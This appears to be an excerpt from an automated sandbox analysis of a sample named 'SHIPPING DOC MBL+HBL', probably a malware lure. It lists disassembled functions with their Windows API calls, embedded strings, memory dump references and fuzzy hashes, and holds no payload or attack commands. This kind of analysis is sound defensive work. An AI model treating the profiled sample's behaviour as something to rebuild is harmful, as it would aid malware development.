                    • Instruction Fuzzy Hash: 88A1C171204206AFD718DF20C884BAAB7E9FF4431AF185B29FD99E2151D730E949CBD2
                    Function 00E5B196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00E5B1DA
                    • _wcscmp.LIBCMT ref: 00E5B1EB
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5B213
                    • CharUpperBuffW.USER32(?,00000000), ref: 00E5B230
                    • _wcscmp.LIBCMT ref: 00E5B24E
                    • _wcsstr.LIBCMT ref: 00E5B25F
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B297
                    • _wcscmp.LIBCMT ref: 00E5B2A7
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5B2CE
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B317
                    • _wcscmp.LIBCMT ref: 00E5B327
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00E5B34F
                    • GetWindowRect.USER32(00000004,?), ref: 00E5B3B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 014c9b79b1bb690b616580c57c0c10daedbccdce4d0fe307a50265cd5c944d8e
                    • Instruction ID: eb09826fd2a5af2df6e69795b7e37dca1a8e09c95476ad96e07d94456fce640b
                    • Opcode Fuzzy Hash: 014c9b79b1bb690b616580c57c0c10daedbccdce4d0fe307a50265cd5c944d8e
                    • Instruction Fuzzy Hash: BF81B4710043059FDB10DF14C885FAA77E8EF44319F14A96AFD89BA0A2EB74DD49CB61
                    Function 00E8C668 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DragQueryPoint.SHELL32(?,?), ref: 00E8C691
                      • Part of subcall function 00E8AB69: ClientToScreen.USER32(?,?), ref: 00E8AB92
                      • Part of subcall function 00E8AB69: GetWindowRect.USER32(?,?), ref: 00E8AC08
                      • Part of subcall function 00E8AB69: PtInRect.USER32(?,?,00E8C07E), ref: 00E8AC18
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C6FA
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8C705
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8C728
                    • _wcscat.LIBCMT ref: 00E8C758
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8C76F
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C788
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C79F
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C7C1
                    • DragFinish.SHELL32(?), ref: 00E8C7C8
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8C8BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                    • API String ID: 169749273-730855631
                    • Opcode ID: ac17db1c39f92220f7ca7ab3f7888289647086d50cfd175c9eef68c8ac35a226
                    • Instruction ID: 0590a05f620c65c787d9a12e93a7a5ee1bd6b4a4382c0d05a599106db22ef380
                    • Opcode Fuzzy Hash: ac17db1c39f92220f7ca7ab3f7888289647086d50cfd175c9eef68c8ac35a226
                    • Instruction Fuzzy Hash: 5D617072108301AFC700EF60DC85D9BBBF8EF89710F10192EF599A61A1DB31A989CB52
                    Function 00E5AFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: c53ef670271d78f452e040f7d2c53203d3c5a8a320c93b164f4e9b37d45b77e6
                    • Instruction ID: 51217c8e6a43a27fd6f4899b553c1aad498ede8c2f37f9f6f07dd1a03501d54d
                    • Opcode Fuzzy Hash: c53ef670271d78f452e040f7d2c53203d3c5a8a320c93b164f4e9b37d45b77e6
                    • Instruction Fuzzy Hash: CC319231A48309E6DB24FA60DD53EEF77E49F24711F202829F895714D2EF616F48CA51
                    Function 00E5C2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00E5C2D3
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E5C2E5
                    • SetWindowTextW.USER32(?,?), ref: 00E5C2FC
                    • GetDlgItem.USER32(?,000003EA), ref: 00E5C311
                    • SetWindowTextW.USER32(00000000,?), ref: 00E5C317
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C327
                    • SetWindowTextW.USER32(00000000,?), ref: 00E5C32D
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E5C34E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E5C368
                    • GetWindowRect.USER32(?,?), ref: 00E5C371
                    • SetWindowTextW.USER32(?,?), ref: 00E5C3DC
                    • GetDesktopWindow.USER32 ref: 00E5C3E2
                    • GetWindowRect.USER32(00000000), ref: 00E5C3E9
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E5C435
                    • GetClientRect.USER32(?,?), ref: 00E5C442
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E5C467
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E5C492
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: e9ffaf5d82a279e7ebe20f7d6b3d0047fa6e84c31af063f2f971216885973b08
                    • Instruction ID: 11c023932d5cd7d8fe19aeb3e09d4a630ae75786f86db480d27d68f70cf9dc7d
                    • Opcode Fuzzy Hash: e9ffaf5d82a279e7ebe20f7d6b3d0047fa6e84c31af063f2f971216885973b08
                    • Instruction Fuzzy Hash: FE519F30900709EFDB20DFA9DD85B6EBBF5FF04709F104A28EA46B25A0D770A958DB50
                    Function 00E75113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00E75129
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E75134
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00E7513F
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00E7514A
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00E75155
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00E75160
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00E7516B
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00E75176
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00E75181
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00E7518C
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00E75197
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00E751A2
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00E751AD
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00E751B8
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00E751C3
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00E751CE
                    • GetCursorInfo.USER32(?), ref: 00E751DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    • Opcode ID: 1c488541b5a545db8e16fdd4a35b6bc473506704bf17832ab9b0d52a558f6ae6
                    • Instruction ID: e60c2686e01de238d8ca0f7b0be488080e4350292da6f6d9e4871f4b71725320
                    • Opcode Fuzzy Hash: 1c488541b5a545db8e16fdd4a35b6bc473506704bf17832ab9b0d52a558f6ae6
                    • Instruction Fuzzy Hash: 253117B1D4831D6ADB109FB69C8995FBEF8FF04750F50452AE50DF7281DA7865008F91
                    Function 00E8A1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E8A28B
                    • DestroyWindow.USER32(?,?), ref: 00E8A305
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A37F
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A3A1
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A3B4
                    • DestroyWindow.USER32(00000000), ref: 00E8A3D6
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8A40D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A426
                    • GetDesktopWindow.USER32 ref: 00E8A43F
                    • GetWindowRect.USER32(00000000), ref: 00E8A446
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8A45E
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8A476
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 3825d3633978b697ff376fb40a936c147d709e5eb6eb46a7817f232ee8421452
                    • Instruction ID: 1c000f99aa62a77169b78b1ce5ca33b9168f0ed9e4885f8eec4d10e1c6daaaac
                    • Opcode Fuzzy Hash: 3825d3633978b697ff376fb40a936c147d709e5eb6eb46a7817f232ee8421452
                    • Instruction Fuzzy Hash: 3971BF71150244AFEB24DF28CC49F6A77E5FB88704F08052DF999A72A0DB71E946CF52
                    Function 00E8B832 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E8B8E8
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E86B43,?), ref: 00E8B944
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B97D
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E8B9C0
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B9F7
                    • FreeLibrary.KERNEL32(?), ref: 00E8BA03
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8BA13
                    • DestroyIcon.USER32(?), ref: 00E8BA22
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E8BA3F
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E8BA4B
                      • Part of subcall function 00E2307D: __wcsicmp_l.LIBCMT ref: 00E23106
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl$Ck
                    • API String ID: 1212759294-4079180798
                    • Opcode ID: b50c3e9a281dfc4155b5e1f6e5ab2070e1080cef649473b4f20fe2f357b21a12
                    • Instruction ID: 669e43d55127a578e2fc1bf428dcac035c8111e552effa3b34da2197b4fcbc7f
                    • Opcode Fuzzy Hash: b50c3e9a281dfc4155b5e1f6e5ab2070e1080cef649473b4f20fe2f357b21a12
                    • Instruction Fuzzy Hash: B161FF71900619BEEB18EF64CC81FBE77A8EB08710F10551AF91DF61D1DB74AA84CBA0
                    Function 00E843FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00E8448D
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E844D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: e5812ceee4a86463b0da6fb4bdc27b2120a71a0a5e984afab1ad944832ee09c8
                    • Instruction ID: 0d30ce238a7fee6887ba92566b605fa73bef549305a5073aa42abb0c05f4376e
                    • Opcode Fuzzy Hash: e5812ceee4a86463b0da6fb4bdc27b2120a71a0a5e984afab1ad944832ee09c8
                    • Instruction Fuzzy Hash: 40915BB02047129BCB14EF14C491AAAB7E1EF95314F14685DE89A7B3E3DB31ED49CB81
                    Function 00E6A3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00E6A455
                    • GetDriveTypeW.KERNEL32 ref: 00E6A4A2
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A4EA
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A521
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A54F
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 38d306033ea6b5b5978ba462fcd33aefa37cffc334128b7b5ca12172366d1fca
                    • Instruction ID: 143a2af0b0b66ef265dfcec386a4e88693bcb9490d7ef4876fb274457aca110b
                    • Opcode Fuzzy Hash: 38d306033ea6b5b5978ba462fcd33aefa37cffc334128b7b5ca12172366d1fca
                    • Instruction Fuzzy Hash: 5F516C715043059FC700EF20D99186AB7E8EF98718F04596DF89A772A2DB31EE4ACB52
                    Function 00E3AA4B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: e7378f7aa6d3be7049a64bce67a08ddc710596cba431fb6efe6c507441f71310
                    • Instruction ID: de1a6fd02d62ea9993cb1340370ceccd83e80e5b7ec173097bde900b5a2323f5
                    • Opcode Fuzzy Hash: e7378f7aa6d3be7049a64bce67a08ddc710596cba431fb6efe6c507441f71310
                    • Instruction Fuzzy Hash: 48611672501211AFD7205F34DD09B6ABBE8EF40328F187139E881BB191DB39DD81C792
                    Function 00E6D925 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                    Download Yara Rule
                    APIs
                    • __wsplitpath.LIBCMT ref: 00E6DA9C
                    • _wcscat.LIBCMT ref: 00E6DAB4
                    • _wcscat.LIBCMT ref: 00E6DAC6
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6DADB
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DAEF
                    • GetFileAttributesW.KERNEL32(?), ref: 00E6DB07
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E6DB21
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DB33
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: 767e20b05ee46c3e38e1346fc17d376cb67365b413a8450ba4ce89b821e0e93e
                    • Instruction ID: c09178d2c00dcc8c3f99a55754b878a8cc8a5fc0bad92b8d124bfbcc82757e7f
                    • Opcode Fuzzy Hash: 767e20b05ee46c3e38e1346fc17d376cb67365b413a8450ba4ce89b821e0e93e
                    • Instruction Fuzzy Hash: E2819372B4C2409FCB24EF64DC449AAB7E4BB88394F586C2EF489E7251D670D944CB92
                    Function 00E8C216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C266
                    • GetFocus.USER32 ref: 00E8C276
                    • GetDlgCtrlID.USER32(00000000), ref: 00E8C281
                    • _memset.LIBCMT ref: 00E8C3AC
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8C3D7
                    • GetMenuItemCount.USER32(?), ref: 00E8C3F7
                    • GetMenuItemID.USER32(?,00000000), ref: 00E8C40A
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8C43E
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8C486
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8C4BE
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8C4F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 813492b30bd122374ac80a061f539378fd6a98276a06c5ddbbf062ae3d8a650b
                    • Instruction ID: 6e4e52afeea772982703ab2208eca86c0748fe0cbc850fd1a136f18348bb3575
                    • Opcode Fuzzy Hash: 813492b30bd122374ac80a061f539378fd6a98276a06c5ddbbf062ae3d8a650b
                    • Instruction Fuzzy Hash: 66818F712083019FD710EF15D894A6B7BE4EF89318F20552DF9ADB7291C771D885CBA2
                    Function 00E7742F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 00E774A4
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E774B0
                    • CreateCompatibleDC.GDI32(?), ref: 00E774BC
                    • SelectObject.GDI32(00000000,?), ref: 00E774C9
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E7751D
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77559
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E7757D
                    • SelectObject.GDI32(00000006,?), ref: 00E77585
                    • DeleteObject.GDI32(?), ref: 00E7758E
                    • DeleteDC.GDI32(00000006), ref: 00E77595
                    • ReleaseDC.USER32(00000000,?), ref: 00E775A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
